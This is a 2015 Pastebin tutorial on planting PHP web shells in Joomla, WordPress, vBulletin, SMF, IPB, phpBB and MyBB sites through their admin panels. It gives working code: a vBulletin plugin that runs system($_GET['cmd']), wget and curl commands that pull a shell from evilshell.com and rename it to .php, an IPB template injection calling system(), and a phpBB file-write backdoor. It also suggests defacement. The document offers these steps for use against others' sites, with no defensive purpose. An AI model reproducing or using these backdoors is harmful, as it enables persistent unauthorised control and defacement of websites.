Advertisement
Kyfx

Shell tut -joomla,wp,vb,smf,ipb,mybb

Jun 16th, 2015
472
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.79 KB | None | 0 0
  1. 1.Joomla Site[color=#1E90FF]
  2. After Login into adminpanel u will find Extensions on 5th No. expand this
  3. click on it > template Manager > check on any template (like beez,ja_purity)
  4. Now click on Edit (right upper side)
  5. after this click on Edit html
  6. now paste ur shell code and click save...done
  7. site.com/templates/template name/index.php
  8. like site.com/templates/beez/index.php
  9.  
  10. [b]2.Wordpress:
  11. login into admin panel
  12. expand Appearance then click on editor > u will find style.css
  13. now select 404.php on right side
  14. paste ur shell code and click edit file
  15. u can find shell in site.com/wp-content/themes/theme name u edit/404.php
  16. 3.Vbulletin
  17. 1-Log in admin cp
  18. 2-Under “Plugins & Products”, select Add New Plugin
  19. 3-Adjust the settings as follows:
  20. Product: vBulletin
  21.  
  22. Hook Location: global_start
  23.  
  24. Title: (Anything …)
  25.  
  26. Execution Order: 5
  27.  
  28. Code:
  29. ob_start();
  30. system($_GET['cmd']);
  31. $execcode = ob_get_contents();
  32. ob_end_clean(); Plugin is Active : Yes
  33.  
  34. So in the end it should look like this:
  35.  
  36. 4-After the plugin is added, go to the heading “Style and Design”, select “Style Manager
  37. 5-Under whatever the default style is in the dropdown menu, select Edit Templates.
  38. 6-Scroll ForumHome models and expand. Click [Customize] beside FORUMHOME.
  39. 7-Search
  40.  
  41. Code:
  42. $header
  43.  
  44. Somewhere near the top. Replace it with:
  45.  
  46. Code:
  47. $header
  48. $execcod
  49.  
  50. e
  51.  
  52. 8-Now go to the forum and add after the index.php
  53.  
  54. Code:
  55. ?cmd=wget http://www.evilshell.com/shell.txt;mv shell.txt shell.php
  56.  
  57. So it looks like
  58.  
  59. Code:
  60. http://www.site.com/pathtoforum/index.php?cmd=wget http://www.evilshell.com/shell.txt;mv shell.txt shell.php
  61.  
  62. What this does is shell.txt downloads, and renames shell.php
  63.  
  64. Now,
  65. the shell must be located in the directory shell.php forums … If not,
  66. then wget is disabled on that server, you can try alternative methods:
  67. Code:
  68. http://www.site.com/pathtoforum/index.php?cmd=curl http://www.evilshell.com/shell.txt > shell.php
  69.  
  70. Code:
  71. http://www.site.com/pathtoforum/index.php?cmd=GET http://www.evilshell.com/shell.txt shell.php
  72.  
  73. 4.SMF
  74. login into adminpanel
  75. u need to download any smf theme in zip format and put ur shell.php in it and save
  76. admin panel > select Themes and Layout > Install a new theme > browse and upload theme thats have our shell.php :)
  77. after upload shell will find > site.com/Themes/theme name/shell.php
  78. 5.IPB
  79. login admin panel > Look and Feel >Manage Languages, choose language > section (example) public_help
  80. edit:
  81. help.txt
  82.  
  83. Choose topic from list, or search for a topic
  84. In right box add this code:
  85.  
  86. ${${print $query='cd cache; wget http://link_to_shell/shell.txt;mv shell.txt shell.php'}}
  87. ${${system($query,$out)}}
  88. ${${print $out}}
  89.  
  90. When you add it, specify go on bottom
  91. Now we go on:
  92.  
  93. http://www.site.com/index.php?app=core&module=help
  94.  
  95. And our code we add will be done, and you will get your shell @ www,site.com/cache/shell.php
  96.  
  97. 6.phpBB
  98. login into admin panel > go on styles -> templates -> edit, for Template file choose faq_body.html
  99. At down of:
  100. <!-- INCLUDE overall_header.html -->
  101.  
  102. We add:
  103. <!-- PHP -->fwrite(fopen($_GET[o], 'w'), file_get_contents($_GET[i]));
  104. <!-- ENDPHP -->[php]
  105.  
  106. And save it.Now go on:
  107. [php]www.site.com/forum/faq.php?o=shell.php&i=http://link_to_shell.com/shell.txt
  108.  
  109. shell find in site path/shell.php
  110. [/php]
  111. Mybb forum
  112. login admincp > Go to Templates and Styles, find default MyBB Theme is.
  113. Then go to Templates,
  114. expand templates that are used by the current theme.
  115. Find Calendar templates,
  116. click it. Click 'calender'. Above all the html code, paste this:
  117. http://pastebin.com/eV1WngfM
  118. save :)
  119. shell will b find in site.com/calendar.php
  120. note: if u got error like "code is danger unable to edit "
  121. then simply paste ur deface code to deface calendar.php
  122.  
  123.  
  124.  
  125. Hope you now know how to use it <3
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement